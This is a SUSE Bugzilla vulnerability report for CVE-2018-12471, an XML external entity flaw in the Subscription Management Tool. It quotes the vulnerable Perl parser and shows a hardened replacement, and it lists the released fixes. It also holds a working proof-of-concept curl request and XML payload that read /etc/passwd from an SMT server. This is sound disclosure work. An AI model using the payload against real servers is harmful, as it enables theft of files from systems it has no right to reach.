Bugzilla – Bug 1103809
VUL-0: CVE-2018-12471: smt: Xml External Entity processing in the RegistrationSharing modules allows arbitrary file read
Last modified: 2020-09-18 12:37:40 UTC
EMBARGOED reported by ebx@riseup.net via mail to security@suse.de

[...] current release (v3.0.32) of the Subscription Management Tool (https://github.com/SUSE/smt) [...] in the RegistrationSharing module

The first vulnerability is an XXE that can be exploited during both the `deleteSharedRegistration` and `addSharedRegistration` subroutines. In RegistrationSharing.pm, the `_getXMLFromPostData` subroutine (https://github.com/SUSE/smt/blob/SMT12/www/perl-lib/SMT/RegistrationSharing.pm#L342) contains code to parse XML data from POST requests (utilized in the aforementioned routines):

    ...
    my $postData = shift;
    my $xml;
    my $parser = XML::LibXML->new();
    eval {
        # load_xml not available on SLES 11 SP3 due to version of
        # LibXML and underlying libxml2
        #$xm = XML::LibXML->load_xml(string => $postData);
        my $POSTDATAFL = File::Temp->new(SUFFIX=>'.txt');
        $POSTDATAFL->write($postData);
        $POSTDATAFL->flush();
        seek $POSTDATAFL, 0,0;
        $xml = $parser->parse_fh($POSTDATAFL);
    };
    ....

The code creates a new XML parser, dumps the POST data to a new temporary file and then uses the previously created parser to parse the XML from the temporary file. The problem here is that Perl's LibXML library by default allows external entities to be loaded. By sending a specially crafted XML payload it is possible to achieve DoS and SSRF. Additionally, due to a reflection point in code that echoes back the entire XML document when no table name is specified (https://github.com/SUSE/smt/blob/SMT12/www/perl-lib/SMT/RegistrationSharing.pm#L293) it is possible to read arbitrary files from the machine.
Here is an example payload that will read /etc/passwd:

    curl -X POST -d @readfile.xml "http://<smt_url>/center/regsvc?command=shareregistration&lang=en-US&version=1.0"

readfile.xml:

    <?xml version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>
    <registrationData>
      <tableData>
        <entry columnName="NAMESPACE" value="">&xxe;</entry>
        <entry columnName="HOSTNAME" value="smt-client"/>
      </tableData>
    </registrationData>
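A hardened replacement for the `_getXMLFromPostData` pattern quoted above, added here as an example; it is not code from the SMT project or from the fix repository. `make_safe_parser`, `parse_post_data` and `entry_values` are names chosen for this example, and the sample POST body is constructed with a placeholder SYSTEM path. The parser options used are the documented XML::LibXML ones that switch off entity substitution, external DTD loading and network access; on top of that the example refuses any DOCTYPE, since registration data never needs one.

```perl
use strict;
use warnings;
use XML::LibXML;

# Constructed sample POST body shaped like the report's readfile.xml;
# the SYSTEM URI is a placeholder path, not a real file.
my $POST_DATA = <<'XML';
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///placeholder/not-a-real-file"> ]>
<registrationData>
  <tableData>
    <entry columnName="NAMESPACE" value="">&xxe;</entry>
    <entry columnName="HOSTNAME" value="smt-client"/>
  </tableData>
</registrationData>
XML

# Hardened parser: no entity substitution, no external DTD/entity loading,
# no network access (all documented XML::LibXML parser options).
sub make_safe_parser {
    return XML::LibXML->new(
        expand_entities => 0,
        load_ext_dtd    => 0,
        no_network      => 1,
    );
}

# Parse a POST body; returns the document or undef when rejected.
# Registration data never needs a DTD, so any DOCTYPE is refused outright
# rather than relying on parser options alone.
sub parse_post_data {
    my ($post_data) = @_;
    my $doc = eval { make_safe_parser()->parse_string($post_data) };
    if (!$doc) { warn "XML rejected: $@"; return undef; }
    if ($doc->internalSubset || $doc->externalSubset) {
        warn "XML rejected: DOCTYPE not allowed in registration data\n";
        return undef;
    }
    return $doc;
}

# Return only the column values; never echo the parsed document back.
sub entry_values {
    my ($doc) = @_;
    return { map { $_->getAttribute('columnName') => $_->textContent }
                 $doc->findnodes('//tableData/entry') };
}

my $doc = parse_post_data($POST_DATA);     # rejected: sample carries a DOCTYPE
print defined $doc ? "accepted\n" : "rejected\n";
```

Extracting only the needed column values, as `entry_values` does, also removes the reflection point the report describes, so even a parser that did expand an entity would not hand its contents back to the client.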
We created a private repo to work on a fix for this issue: https://github.com/SUSE/smt-security-update Could you open a pull request for that one?
I have assigned CVE-2018-12471.
SUSE would like to thank Jake Miller for reporting these issues to us.
updates released
SUSE-SU-2018:2898-1: An update that solves three vulnerabilities and has 6 fixes is now available.

Category: security (important)
Bug References: 1006984,1006989,1037811,1097560,1097824,1103809,1103810,1104076,977043
CVE References: CVE-2018-12470,CVE-2018-12471,CVE-2018-12472

Sources used:
SUSE OpenStack Cloud 7 (src): smt-3.0.37-52.23.6
SUSE Linux Enterprise Server for SAP 12-SP2 (src): smt-3.0.37-52.23.6
SUSE Linux Enterprise Server for SAP 12-SP1 (src): smt-3.0.37-52.23.6, yast2-smt-3.0.14-10.6.2
SUSE Linux Enterprise Server 12-SP3 (src): smt-3.0.37-52.23.6
SUSE Linux Enterprise Server 12-SP2-LTSS (src): smt-3.0.37-52.23.6
SUSE Linux Enterprise Server 12-SP1-LTSS (src): smt-3.0.37-52.23.6, yast2-smt-3.0.14-10.6.2
SUSE Linux Enterprise Module for Public Cloud 12 (src): perl-File-Touch-0.11-3.2.2, smt-3.0.37-52.23.6
SUSE Enterprise Storage 4 (src): smt-3.0.37-52.23.6
SUSE-SU-2018:2899-1: An update that solves three vulnerabilities and has two fixes is now available.

Category: security (important)
Bug References: 1072921,1074608,1103809,1103810,1104076
CVE References: CVE-2018-12470,CVE-2018-12471,CVE-2018-12472

Sources used:
Subscription Management Tool for SUSE Linux Enterprise 11-SP3 (src): smt-2.0.34-50.8.1
fixed
SUSE-SU-2018:2898-2: An update that solves three vulnerabilities and has 6 fixes is now available.

Category: security (important)
Bug References: 1006984,1006989,1037811,1097560,1097824,1103809,1103810,1104076,977043
CVE References: CVE-2018-12470,CVE-2018-12471,CVE-2018-12472

Sources used:
SUSE Linux Enterprise Server 12-SP2-BCL (src): smt-3.0.37-52.23.6